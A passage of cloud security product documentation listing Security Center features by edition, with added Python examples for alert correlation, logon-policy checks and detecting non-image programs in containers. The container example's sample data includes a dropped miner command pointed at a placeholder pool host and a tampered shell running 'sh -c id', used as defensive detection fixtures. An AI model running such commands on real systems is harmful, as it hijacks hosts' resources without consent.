      • Network Defense Alert (formerly Attack Analysis): If you enable the Network Threat Prevention rules under Host Rules - Malicious Behavior Prevention and the Host Rules - Anti-Brute-Force policy, Security Center blocks high-risk network attack behaviors such as malicious DNS requests, webshell uploads, web attacks (through adaptive web attack defense), and brute-force attacks. The Network Defense Alert page shows details of the intercepted network attacks.

    • Edition support:

      Subscription

      • Basic and Value-added Plan

        • Detection scope: Common simple attacks in the cloud, including traditional one-line webshells, logons from uncommon locations, self-mutating Trojans, DDoS Trojans, and mining programs (does not include container assets).

        • Alert handling: alert suppression (Add to Whitelist, Ignore, etc.).

      • Anti-virus

        • Detection scope: Capabilities of Basic + detection and precision defense models for suspicious and malicious files, including binaries (does not include container assets).

        • Alert handling: threat removal (Virus Detection and Removal, Deep Cleanup, Quarantine, etc.) and alert suppression (Add to Whitelist, Ignore, etc.).

      • Advanced

        • Detection scope: Capabilities of Anti-virus + detection and precision defense models for suspicious and malicious process activities and file operations (does not include container assets).

        • Alert handling: threat removal and alert suppression, as for Anti-virus.

      • Enterprise

        • Detection scope: Capabilities of Advanced + over 380 detection and precision defense models covering all malicious behaviors, such as process activities, file operations, and network connections (does not include container assets).

        • Alert handling: threat removal and alert suppression, as for Anti-virus.

      • Ultimate

        • Detection scope: Capabilities of Enterprise, extended to container assets, + detection and active defense models for container-specific attack behaviors such as container escapes, running risky images, and starting non-image programs.

        • Alert handling: threat removal and alert suppression, as for Anti-virus.

      Pay-as-you-go

      • Unprotected

        • Detection scope: Common simple attacks in the cloud, including traditional one-line webshells, logons from uncommon locations, self-mutating Trojans, DDoS Trojans, and mining programs (does not include container assets).

        • Alert handling: alert suppression (Add to Whitelist, Ignore, etc.).

      • Antivirus

        • Detection scope: Capabilities of the Unprotected level + detection and precision defense models for suspicious and malicious files, including binaries (does not include container assets).

        • Alert handling: threat removal (Virus Detection and Removal, Deep Cleanup, Quarantine, etc.) and alert suppression (Add to Whitelist, Ignore, etc.).

      • Host Protection

        • Detection scope: Capabilities of the Antivirus level + over 380 detection and precision defense models covering all malicious behaviors, such as process activities, file operations, and network connections (does not include container assets).

        • Alert handling: threat removal and alert suppression, as for Antivirus.

      • Hosts and Container Protection

        • Detection scope: Capabilities of Host Protection, extended to container assets, + detection and active defense models for container-specific attack behaviors such as container escapes, running risky images, and starting non-image programs.

        • Alert handling: threat removal and alert suppression, as for Antivirus.

  • Security Event Handling

    • Feature description:

      • Security Center uses graph computing technology to aggregate related CWPP alerts (such as those with the same MD5 hash or parent process ID) into events. By assessing the impact of an event, executing handling actions to contain the threat, and hardening the system, you can prevent similar events from recurring.

      • Handling methods: Use Recommended Handling Policy, Add to Whitelist, Update Incident Status, and Run Playbook.

    • Edition support: Supported by default in all editions. However, the types of alerts that can be detected and used to generate events vary by edition.
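The aggregation described above, linking alerts that share a file hash or sit in the same process tree and treating each connected component of that graph as one event, can be illustrated with a small union-find over constructed alert records. This is an added example, not Security Center's code; the alert fields (md5, pid, ppid, host) and the sample alerts are assumptions made for the illustration, not the product's alert schema.

```python
"""Group related host alerts into events by shared indicators.

Added example, not Security Center's own code. The alert records below are
constructed and only loosely shaped like CWPP alerts (file hash, pid, ppid).
"""
from collections import defaultdict

ALERTS = [  # constructed sample alerts
    {"id": "a1", "host": "web-01", "type": "webshell_upload",     "md5": "d41d8cd9", "pid": 4120, "ppid": 1100},
    {"id": "a2", "host": "web-01", "type": "suspicious_process",  "md5": "d41d8cd9", "pid": 4130, "ppid": 4120},
    {"id": "a3", "host": "web-01", "type": "outbound_connection", "md5": "9e107d9d", "pid": 4131, "ppid": 4120},
    {"id": "a4", "host": "db-02",  "type": "mining_program",      "md5": "d41d8cd9", "pid": 9001, "ppid": 1},
    {"id": "a5", "host": "db-02",  "type": "uncommon_logon",      "md5": None,       "pid": None, "ppid": None},
]


class DisjointSet:
    """Union-find: connected components of the alert graph are the events."""

    def __init__(self, items):
        self.parent = {i: i for i in items}

    def find(self, x):
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def correlate(alerts):
    """Return events: alerts linked by a shared file hash (on any host) or by a
    parent/child process relation on the same host end up in the same event."""
    by_id = {a["id"]: a for a in alerts}
    ds = DisjointSet(by_id)
    edges = []

    # Edge type 1: same file hash anywhere in the fleet (same payload => same campaign).
    by_md5 = defaultdict(list)
    for a in alerts:
        if a["md5"]:
            by_md5[a["md5"]].append(a["id"])
    for md5, ids in by_md5.items():
        for other in ids[1:]:
            ds.union(ids[0], other)
            edges.append((ids[0], other, f"same md5 {md5}"))

    # Edge type 2: the alert's parent pid is another alert's pid on the same host.
    pid_index = {(a["host"], a["pid"]): a["id"] for a in alerts if a["pid"] is not None}
    for a in alerts:
        parent = pid_index.get((a["host"], a["ppid"]))
        if parent and parent != a["id"]:
            ds.union(parent, a["id"])
            edges.append((parent, a["id"], "parent process"))

    groups = defaultdict(list)
    for aid in by_id:
        groups[ds.find(aid)].append(aid)

    events = []
    for members in groups.values():
        members.sort()
        hosts = {by_id[m]["host"] for m in members}
        events.append({
            "alerts": members,
            "hosts": sorted(hosts),
            "indicators": sorted({by_id[m]["md5"] for m in members if by_id[m]["md5"]}),
            "edges": [e for e in edges if e[0] in members],
            "cross_host": len(hosts) > 1,   # same payload seen on several hosts
        })
    # Largest event first; deterministic order for equal sizes.
    events.sort(key=lambda e: (-len(e["alerts"]), e["alerts"]))
    return events


if __name__ == "__main__":
    for ev in correlate(ALERTS):
        print(ev["alerts"], ev["hosts"], "cross-host" if ev["cross_host"] else "single host")
        for src, dst, why in ev["edges"]:
            print(f"  {src} -> {dst}: {why}")
```

With the constructed input, the webshell upload, the two child processes it spawned, and the mining program on a second host that shares the same hash collapse into one cross-host event, while the isolated uncommon logon stays a one-alert event; the recorded edges are what an analyst reads to assess the event's impact before choosing a handling action.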

  • Log Management

    • Feature description: Supports storing and viewing Security Center logs, such as vulnerability logs, security alert logs, and client event logs. This helps you accurately locate alerts, perform attack attribution, and improve response speed.

    • Edition support:

      • Subscription: Purchase Log Storage Capacity for the Threat Analysis value-added service.

        Important

        If you only purchase log ingestion traffic, storing and querying Security Center logs is not supported.

      • Pay-as-you-go: Enable the pay-as-you-go service for Log Management.

Agentic SOC

When you enable the Agentic SOC service, services related to Detection and Response are moved under the Agentic SOC service. It also supports ingesting logs from third-party cloud products (such as Tencent Cloud and Huawei Cloud) and on-premises data centers.

  • Feature description:

    • Product Integration: Provides a unified log integration center to help you centrally collect, standardize, and analyze log data from third-party security products and clouds (such as Fortinet, Chaitin, Microsoft, Sangfor, Tencent Cloud, Huawei Cloud, Hillstone, and Dosin) and from on-premises data centers.

    • Detection Rules: Performs in-depth detection and analysis of ingested alerts and logs, reconstructs threat attack chains and timelines, and generates correlated alerts and detailed security events. It also supports custom detection rules to build a threat detection system tailored to your business.

    • Security Alerts

      • Analyzes and processes logs ingested into Agentic SOC to generate alerts and events.

      • The CWPP Security Alerts feature is moved into the Agentic SOC Security Alerts feature.

    • Security Event Handling

      • Uses predefined or custom detection rules in Agentic SOC to analyze the context of multiple security alerts and aggregate them into complete events. It reconstructs the attack chain and extracts malicious entities to help you quickly respond to and handle cloud security risks.

      • The feature for aggregating CWPP alerts (such as those with the same MD5 hash or parent process ID) into security events is moved into Agentic SOC Security Event Handling.

      • Handling methods: In addition to Use Recommended Handling Policy, Update Incident Status, Run Playbook, and Add to Whitelist, it also supports automatic handling of security events (response orchestration).

    • Response Rules: Security Orchestration, Automation, and Response (SOAR) is a comprehensive security solution that orchestrates and connects different systems or services according to a certain logic to achieve automated operations and maintenance for security alerts and events. It aims to strengthen enterprise security defenses and improve security event response efficiency.

    • Log Management:

      • Standardized logs: Stores the standardized alert logs generated by custom rules, and the standardized logs produced by the standardized ingestion policy during Real-time Consumption.

      • Security Center logs: The Log Management feature from Detection and Response is moved into the Agentic SOC Log Management feature.

    • Security Operations Agent: An advanced intelligent value-added service provided by Agentic SOC. With Agentic AI as its core engine, it deeply integrates Alibaba Cloud's native security data and infrastructure. It uses the agent's autonomous perception, inference, and execution capabilities to independently analyze security events, helping you achieve rapid security event response.

  • Edition support:

    • Subscription: Purchase the Threat Analysis value-added service.

      Important

      To support Security Center logs, you must also purchase Log Storage Capacity for Threat Analysis.

    • Pay-as-you-go: Enable the pay-as-you-go service for Threat Analysis.

Host Protection

  • Anti-virus Scan

    • Feature description: Security Center's machine learning-based anti-virus engine, built by the Security Center expert team from automated analysis of large volumes of virus samples, persistence methods, and attack techniques, supports one-click virus scanning of your servers.

    • Edition support:

      • Subscription: Anti-virus, Advanced, Enterprise, and Ultimate.

      • Pay-as-you-go: Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Antivirus, Host Protection, or Host and Container Protection.

  • Host Rule Management

    • Feature description:

      • Malicious Behavior Defense: Supports system-built-in and custom malicious behavior prevention rules to harden server system security.

      • Defense Against Brute-force Attacks: Set anti-brute-force policies to prevent host resource account passwords from being cracked by brute-force attacks.

      • Common Logon Management: Set common logon locations, common logon IP addresses, common logon times, and common logon accounts to generate alerts for logons that fall outside the specified scope.

    • Edition support:

      • Subscription:

        • Anti-virus: Only supports whitelisting process hashes using custom rules in Malicious Behavior Defense, and only supports Common Logon Location management in Common Logon Management.

        • Advanced: Only supports Process Protection under System Defense Rule in Malicious Behavior Defense (network defense is not supported). Supports all features of Defense Against Brute-force Attacks and Common Logon Management.

        • Enterprise and Ultimate: Supports all features of Malicious Behavior Defense, Defense Against Brute-force Attacks, and Common Logon Management.

      • Pay-as-you-go: Enable the pay-as-you-go service for Host and Container Security, and bind a protection level to your servers.

        • Antivirus: Supports whitelisting process hashes using custom rules in Malicious Behavior Defense, and Common Logon Location management in Common Logon Management.

        • Host Protection and Host and Container Protection: Supports all features of Malicious Behavior Defense, Defense Against Brute-force Attacks, and Common Logon Management.
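The Common Logon Management rule described above (alert on any logon whose location, source IP, time, or account falls outside the configured common scope) amounts to an allowlist check on four dimensions. The following is an added example of that logic, not Security Center's own implementation: the POLICY, the logon records, and their field names are constructed for the illustration. It also handles a logon-time window that wraps past midnight, which the page's description leaves implicit.

```python
"""Flag logons outside the configured common location / IP / time / account scope.

Added example, not Security Center's own code. POLICY and LOGONS are constructed.
"""
import ipaddress
from datetime import datetime, time

POLICY = {  # assumed shape of a "common logon" policy
    "locations": {"Hangzhou", "Shanghai"},
    "networks": [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("203.0.113.0/24")],
    "hours": ("09:00", "20:00"),   # [start, end) as HH:MM; may wrap past midnight
    "accounts": {"root", "deploy"},
}

LOGONS = [  # constructed sample logon records
    {"host": "web-01", "account": "deploy", "src_ip": "10.1.2.3",     "location": "Hangzhou",  "time": "2024-05-06T10:15:00"},
    {"host": "web-01", "account": "root",   "src_ip": "198.51.100.7", "location": "Frankfurt", "time": "2024-05-06T03:42:00"},
    {"host": "db-02",  "account": "admin",  "src_ip": "203.0.113.9",  "location": "Shanghai",  "time": "2024-05-06T12:00:00"},
]


def in_window(hhmm, window):
    """True if the HH:MM time lies in [start, end); handles windows such as 22:00-06:00."""
    t = time.fromisoformat(hhmm)
    start, end = (time.fromisoformat(w) for w in window)
    if start <= end:
        return start <= t < end
    return t >= start or t < end   # window wraps past midnight


def evaluate_logon(logon, policy=POLICY):
    """Return the dimensions on which this logon is uncommon ([] means common)."""
    findings = []
    if logon["location"] not in policy["locations"]:
        findings.append("uncommon_location")
    ip = ipaddress.ip_address(logon["src_ip"])
    if not any(ip in net for net in policy["networks"]):
        findings.append("uncommon_ip")
    hhmm = datetime.fromisoformat(logon["time"]).strftime("%H:%M")
    if not in_window(hhmm, policy["hours"]):
        findings.append("uncommon_time")
    if logon["account"] not in policy["accounts"]:
        findings.append("uncommon_account")
    return findings


def audit(logons, policy=POLICY):
    """One alert per logon that violates at least one dimension."""
    alerts = []
    for logon in logons:
        findings = evaluate_logon(logon, policy)
        if findings:
            alerts.append({"host": logon["host"], "account": logon["account"],
                           "src_ip": logon["src_ip"], "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in audit(LOGONS):
        print(f"{alert['host']}: {alert['account']} from {alert['src_ip']} -> {', '.join(alert['findings'])}")
```

A logon that trips several dimensions at once (unknown location, unknown network, and off-hours) is the pattern worth prioritising; a single-dimension finding such as a new account from a known office network is more often a provisioning gap than an intrusion.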

  • Core File Monitoring

    • Feature description: Provides real-time monitoring and alerting for operations such as accessing, modifying, deleting, and renaming files, reducing the risk of core files being stolen or tampered with.

    • Edition support:

      • Subscription: Enterprise and Ultimate.

      • Pay-as-you-go: Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Host Protection or Host and Container Protection.

  • Agentless Detection

    • Feature description: Uses agentless technology to scan and discover security risks such as ECS vulnerabilities, malicious files, and baseline configuration issues without installing a client.

    • Edition support:

      • Subscription: Not supported.

      • Pay-as-you-go: Enable the pay-as-you-go feature for Agentless Detection under Host Protection.

  • Anti-ransomware

    • Feature description: Supports backup and recovery for server and database files, mitigating the risks associated with ransomware attacks on servers and databases.

    • Edition support:

      • Subscription: Purchase the Anti-ransomware value-added service.

      • Pay-as-you-go: Enable the pay-as-you-go feature for Anti-ransomware under Host Protection.

  • Web Tamper Protection

    • Feature description: Monitors website directories in real time and restores tampered files or directories from backups. This ensures that information on important systems is not maliciously altered and prevents the injection of web trojans, black links, and illegal content such as terrorist threats or pornography.

    • Edition support:

      • Subscription: Purchase the Web Tamper Proofing value-added service.

      • Pay-as-you-go: Enable the pay-as-you-go feature for Web Tamper Proofing.

Container Protection

  • Active Container Protection

    • Feature description:

      • Risk Image Blocking

        This feature checks images for security risks and performs actions such as blocking, alerting, or allowing based on active container protection rules. This ensures that only images that meet your security requirements are started in the cluster.

      • Non-image Program Defense

        This feature detects and blocks the startup of programs that are not part of the original image during container runtime, actively defending against malware intrusion.

      • Container Escape Prevention

        This feature detects high-risk behaviors from multiple dimensions such as processes, files, and system calls. It establishes a protective barrier between the container and the host, effectively blocking escape attempts and ensuring container runtime security.

    • Edition support:

      • Subscription: Ultimate.

      • Pay-as-you-go: Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Host and Container Protection.
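Non-image Program Defense, as described above, comes down to comparing what actually executes in a container against the file set recorded from the image. The following added example (not Security Center's code) shows that comparison on a constructed image manifest and constructed exec events: a program whose path is absent from the image is treated as a non-image program and blocked or alerted on according to the rule mode, and, going one step further than the description above, an image binary whose content hash no longer matches the manifest is flagged as modified and is never exempted by the operator allowlist.

```python
"""Decide whether a process started in a container came from the original image.

Added example, not Security Center's own code. IMAGE_MANIFEST and EXEC_EVENTS
are constructed; real manifests would be built from the image layers and real
exec events from the runtime's process-start telemetry.
"""
import hashlib


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed manifest: path -> sha256 of the file as shipped in the image.
IMAGE_MANIFEST = {
    "/usr/bin/python3": sha256(b"python3-binary"),
    "/usr/bin/sh": sha256(b"sh-binary"),
    "/app/server.py": sha256(b"print('hello')"),
}

# Constructed runtime exec events: path and hash of the executable actually loaded.
EXEC_EVENTS = [
    {"container": "api-7d9f", "path": "/usr/bin/python3", "sha256": sha256(b"python3-binary"),
     "argv": ["python3", "/app/server.py"]},
    {"container": "api-7d9f", "path": "/tmp/.x/miner", "sha256": sha256(b"dropped-miner"),
     "argv": ["miner", "-o", "pool.example:3333"]},
    {"container": "api-7d9f", "path": "/usr/bin/sh", "sha256": sha256(b"trojanized-sh"),
     "argv": ["sh", "-c", "id"]},
]


def classify_exec(event, manifest):
    """image_program: path and content match the image.
    non_image_program: path was never part of the image (dropped at runtime).
    modified_image_program: the path exists but its content was replaced."""
    expected = manifest.get(event["path"])
    if expected is None:
        return "non_image_program"
    if expected != event["sha256"]:
        return "modified_image_program"
    return "image_program"


def enforce(events, manifest, mode="block", allowlist=frozenset()):
    """mode is the rule action for non-image programs: "block" or "alert".
    allowlist holds paths an operator has approved (e.g. a debug tool copied in);
    it never covers modified image programs, since those indicate tampering."""
    decisions = []
    for event in events:
        verdict = classify_exec(event, manifest)
        if verdict == "image_program":
            action = "allow"
        elif verdict == "non_image_program" and event["path"] in allowlist:
            action = "allow"
        else:
            action = mode
        decisions.append({"container": event["container"], "path": event["path"],
                          "verdict": verdict, "action": action})
    return decisions


if __name__ == "__main__":
    for d in enforce(EXEC_EVENTS, IMAGE_MANIFEST):
        print(f"{d['container']} {d['path']}: {d['verdict']} -> {d['action']}")
```

Keying the manifest on content hashes rather than paths alone is what makes the check robust: an attacker who overwrites /usr/bin/sh inside the running container keeps the expected path but not the expected hash, so the replacement is caught even though the path is legitimate.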

  • Container File Protection

    • Feature description: The container file protection feature monitors directories or files within containers in real time. When a directory or file is maliciously tampered with, it generates an alert or blocks the tampering behavior, preventing the injection of illegal information or malicious code files into applications.

    • Edition support:

      • Subscription: Ultimate.

      • Pay-as-you-go: Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Host and Container Protection.

  • Container Firewall

    • Feature description: The container firewall is a firewall service provided by Security Center for container environments. When a hacker intrudes into a container cluster by exploiting vulnerabilities or using malicious images, the container firewall will generate an alert or block the abnormal behavior.

    • Edition support:

      • Subscription: Ultimate.

      • Pay-as-you-go: Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Host and Container Protection.

  • Container Image Signing

    • Feature description: Supports trusted signing of container images to ensure that only approved container images are deployed. This prevents the startup of unauthorized, unsigned images and helps improve asset security.

      Note

      Currently, container image signing is only supported for Kubernetes clusters deployed in the China (Hong Kong) region.

    • Edition support:

      • Subscription: Ultimate.

      • Pay-as-you-go: Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Host and Container Protection.

  • Image Security Scan

    • Feature description: Scans container images for security risks such as system and application vulnerabilities, malicious files, webshells, malicious execution scripts, configuration risks, and sensitive data, and provides remediation suggestions so that risky images can be fixed before they are deployed.

    • Edition support:

      • Subscription: Requires the purchase of the Container Image Scan value-added service.

        Important

        The Container Image Scan value-added service can only be purchased together with the Advanced, Enterprise, Ultimate, or Value-added Plan edition.

      • Pay-as-you-go: Not supported.

  • CI/CD Integration Settings

    • Feature description: Supports detecting and identifying high-risk system vulnerabilities, application vulnerabilities, malicious viruses, webshells, malicious execution scripts, configuration risks, and sensitive data in images during the project build phase in Jenkins or GitHub. It also provides vulnerability remediation suggestions.

    • Edition support:

      • Subscription: Requires the purchase of the Container Image Scan value-added service.

        Important

        The Container Image Scan value-added service can only be purchased together with the Advanced, Enterprise, Ultimate, or Value-added Plan edition.

      • Pay-as-you-go: Not supported.

Application Protection

  • Feature description: Based on Runtime Application Self-Protection (RASP) technology, it provides security defense for applications by detecting attacks during application runtime and generating alerts or blocking the attacks. For more information, see What is Application Protection?.

  • Edition support:

    • Subscription: Purchase the Application Protection value-added service.

    • Pay-as-you-go: Enable the pay-as-you-go service for Application Protection.

System Settings

  • Task Hub

    • Feature description: Provides task management features. By executing tasks, you can automate and batch-remediate vulnerabilities on multiple servers.

    • Edition support:

      • Subscription: Enterprise and Ultimate.

      • Pay-as-you-go: Enable pay-as-you-go for Vulnerability Fixing.

  • Security Reports

    • Feature description: Customize the security data you want to follow and have it sent periodically to the mailboxes of relevant security personnel for more effective real-time monitoring of your asset security status.

    • Edition support:

      • Subscription: Advanced, Enterprise, and Ultimate.

      • Pay-as-you-go: Enable any pay-as-you-go service.

  • Feature Settings - Settings - Host Protection Settings

    • Feature description:

      • Proactive Defense:

        • Malicious Host Behavior Prevention: Automatically blocks and removes common network viruses, including mainstream ransomware, DDoS Trojans, mining programs, Trojans, malicious programs, backdoors, and worms.

        • Anti-ransomware (Bait Capture): Plants bait files to capture new types of ransomware and automatically initiates defense against them through virus behavior analysis.

        • Webshell Prevention: Automatically blocks abnormal connections made by attackers through known webshells. You can view alerts and quarantine samples in Security Alerts, and view quarantined samples in the quarantine box.

        • User Experience Optimization in Proactive Defense: If a server shuts down abnormally or its security defense capabilities are compromised, Security Center collects the server's Kdump data for security analysis to continuously improve the defense experience.

      • Webshell Detection and Removal: Periodically detects web shells and Trojans in website servers and web directories.

      • Adaptive Threat Detection Capability: After you enable adaptive threat detection, if a high-risk intrusion event occurs on a server, Security Center will automatically enable strict alert mode for the server's client to detect hacker intrusions more quickly.

      • Alert Settings: Provides different alert modes for server alerts to meet your security needs in different application scenarios.

        • Balanced Mode: Detects as many potential risks as possible while keeping false positives to a minimum.

          Note

          Security Center enables Balanced Mode by default for all connected servers.

        • Strict Mode: Provides a wider range of suspicious behavior alerts but comes with a higher risk of false positives. It is suitable for use during major events. Enable it with caution.

    • Edition support:

      • Subscription:

        • Anti-virus: Proactive Defense (Malicious Host Behavior Prevention and Anti-ransomware (Bait Capture)), Webshell Detection and Removal, and Alert Settings.

        • Advanced: Proactive Defense (Malicious Host Behavior Prevention, Anti-ransomware (Bait Capture), and Webshell Prevention), Webshell Detection and Removal, and Alert Settings.

        • Enterprise and Ultimate: All features.

      • Pay-as-you-go: Enable the pay-as-you-go service for Host and Container Security, and bind a protection level to your servers.

        • Antivirus: Proactive Defense (Malicious Host Behavior Prevention and Anti-ransomware (Bait Capture)), Webshell Detection and Removal, and Alert Settings.

        • Host Protection and Host and Container Protection: All features.

  • Feature Settings > Settings > Container Protection Settings

    • Feature description:

      • Threat Detection on Kubernetes Containers: Monitors the security status of running container clusters in real time to help you promptly discover security risks and hacker intrusions. It supports the following check items:

        • Abnormal command execution in K8s API Server

        • Abnormal directory mounting in pods

        • Lateral movement using K8s Service Account

        • Startup of pods with malicious images

      • Container Escape Prevention: Detects high-risk behaviors from multiple dimensions such as processes, files, and system calls. It establishes a protective barrier between the container and the host, effectively blocking escape attempts and ensuring container runtime security.

    • Edition support:

      • Subscription: Ultimate.

      • Pay-as-you-go: Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Host and Container Protection.

  • Feature Settings - Settings - Client Capability Configuration

    • Feature description:

      • Agent Protection: After you enable client self-protection, any attempt to uninstall the client other than through the Security Center console is actively blocked. This stops an attacker who has intruded into the server from removing the client, and prevents other programs from accidentally terminating the client process.

      • Client Resource Management: Supports manual adjustment of the client's running mode to limit its resource consumption. This meets the protection needs of servers in various business scenarios and can achieve better security protection effects. It includes Low Consumption Mode, Smooth Mode, and Custom Mode.

      • Local File Detection Engine: The local file detection engine performs security checks on newly created script files and binary files on the server. It reports an alert when a security threat is detected.

      • In-depth Detection Engine: The deep detection engine helps you discover more in-depth security risks such as rootkits, tunnels, and back doors.

    • Edition support:

      • Subscription:

        • Anti-virus and Advanced: Only supports Agent Protection and Client Resource Management (Low Consumption Mode and Smooth Mode).

        • Enterprise and Ultimate: All features.

      • Pay-as-you-go: Enable the pay-as-you-go service for Host and Container Security, and bind a protection level to your servers.

        • Antivirus: Only supports Agent Protection and Client Resource Management (Low Consumption Mode and Smooth Mode).

        • Host Protection and Host and Container Protection: All features.

  • Feature Settings > Settings > Other Configuration

    • Feature description:

      • Data Delivery of ActionTrail: Uses the service-linked role of Security Center to ship ActionTrail data to the Security Center Logstore. Use this data for threat detection and alert analysis, such as abnormal AccessKey calls, abnormal RAM account logons, and high-risk command execution.

      • Global Log Filter: Filters and deduplicates client logs before reporting them, reducing log storage costs while maintaining security effectiveness. This improves the efficiency of log security operations.

    • Edition support:

      • Subscription (Anti-virus, Advanced, Enterprise, and Ultimate): Data Delivery of ActionTrail is supported by default in all editions. Global Log Filter requires the purchase of the Log Analysis value-added service.

        Note

        For the specific log types supported by each edition, see Log types and field descriptions.

      • Pay-as-you-go: Enabling any pay-as-you-go feature supports Data Delivery of ActionTrail.


  • Feature Settings - Client

    • Feature description: Centrally view the servers that have no security client installed, obtain the client installation command, and access the client uninstallation entry. It also supports the agent integration client solution.

    • Edition support: Supported by default in all editions.

  • Feature Settings - Multi-cloud Configuration Management

    • Feature description:

      • Multi-cloud Asset Integration: Supports integrating non-Alibaba Cloud servers (including third-party cloud servers and IDC servers) into Security Center for protection and management.

      • Integrate IDC Assets: Create an IDC probe to detect and discover IDC server assets. Then, synchronize the discovered IDC servers to the Security Center Asset Center module for unified management.

      • Asset Management Rules: Set conditions for different asset management rules to group or tag servers that meet the same conditions. This helps improve asset management efficiency.

    • Edition support: Supported by default in all editions.

  • Notification Settings

    • Feature description: Configure alert policies for various security events, such as security alerts, vulnerability intelligence, and baseline risks. Receive notifications through the following methods:

      • Text Message/Email/Internal Message

      • DingTalk Chatbot

      • Cloud Monitor Push

    • Edition support:

      • Subscription:

        • Anti-virus: Text Message/Email/Internal Message and Cloud Monitor Push.

        • Advanced, Enterprise, and Ultimate: All notification methods.

      • Pay-as-you-go: Enable any pay-as-you-go service.

  • Multi-account Security Management

    • Feature description: Supports unified management of asset security across multiple member accounts within an enterprise. This helps you promptly obtain security risk information for all member accounts in your enterprise.

    • Edition support: Supported by default in all editions.

  • Compliance Check

    • Feature description:

      • Security Compliance Check: Provides classified protection compliance check features covering communication networks, regional boundaries, computing environments, and management centers. It also provides classified protection compliance check reports.

      • ISO 27001 Compliance Check: Checks whether your system complies with ISO 27001 certification requirements, such as asset management, access control, cryptography, and operational security. This helps you achieve ISO 27001 certification.

    • Edition support: Supported by default in all editions.